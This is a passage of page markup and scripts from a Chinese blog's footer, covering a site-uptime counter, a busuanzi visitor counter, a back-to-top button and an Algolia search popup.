  const msPerHour = 60 * msPerMinute;
  const msPerDay = 24 * msPerHour;
  const passDay = Math.floor(timeDiff / msPerDay);
  const passHour = Math.floor((timeDiff % msPerDay) / 60 / 60 / 1000);
  const passMinute = Math.floor((timeDiff % msPerHour) / 60 / 1000);
  const passSecond = Math.floor((timeDiff % msPerMinute) / 1000);
  display_live_time.innerHTML = " " + passDay + " 天 " + passHour + " 小时 " + passMinute + " 分 " + passSecond + " 秒";
}
blog_live_time();
</script></div><div id="busuanzi"><span id="busuanzi_container_site_uv" title="总访客量"><span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-line"></use></svg></span><span id="busuanzi_value_site_uv"></span></span><span class="footer-separator">|</span><span id="busuanzi_container_site_pv" title="总访问量"><span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg></span><span id="busuanzi_value_site_pv"></span></span><script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></footer><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-up-s-line"></use></svg><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#0078E7" stroke-width="2" stroke-linecap="round"></circle></svg></a><a class="popup-trigger hty-icon-button icon-search" id="search" href="javascript:;" title="搜索"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-search-line"></use></svg></span></a><script>window.addEventListener("DOMContentLoaded", () => {
  // Handle and trigger popup window
  document.querySelector(".popup-trigger").addEventListener("click", () => {
    document.querySelector(".popup").classList.add("show");
    setTimeout(() => {
      document.querySelector(".search-input").focus();
    }, 100);
  });

  // Monitor main search box
  const onPopupClose = () => {
    document.querySelector(".popup").classList.remove("show");
  };

  document.querySelector(".popup-btn-close").addEventListener("click", () => {
    onPopupClose();
  });

  window.addEventListener("keyup", event => {
    if (event.key === "Escape") {
      onPopupClose();
    }
  });
});
</script><script defer src="https://cdn.jsdelivr.net/npm/algoliasearch@4/dist/algoliasearch-lite.umd.js"></script><script defer src="https://cdn.jsdelivr.net/npm/instantsearch.js@4/dist/instantsearch.production.min.js"></script><script defer src="/js/search/algolia-search.js"></script><div class="popup search-popup"><div class="search-header"><span class="popup-btn-close close-icon hty-icon-button"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-close-line"></use></svg></span></div><div class="search-input-container"></div><div class="algolia-results"><div id="algolia-stats"></div><div id="algolia-hits"></div><div class="algolia-pagination" id="algolia-pagination"></div></div></div></div></body></html>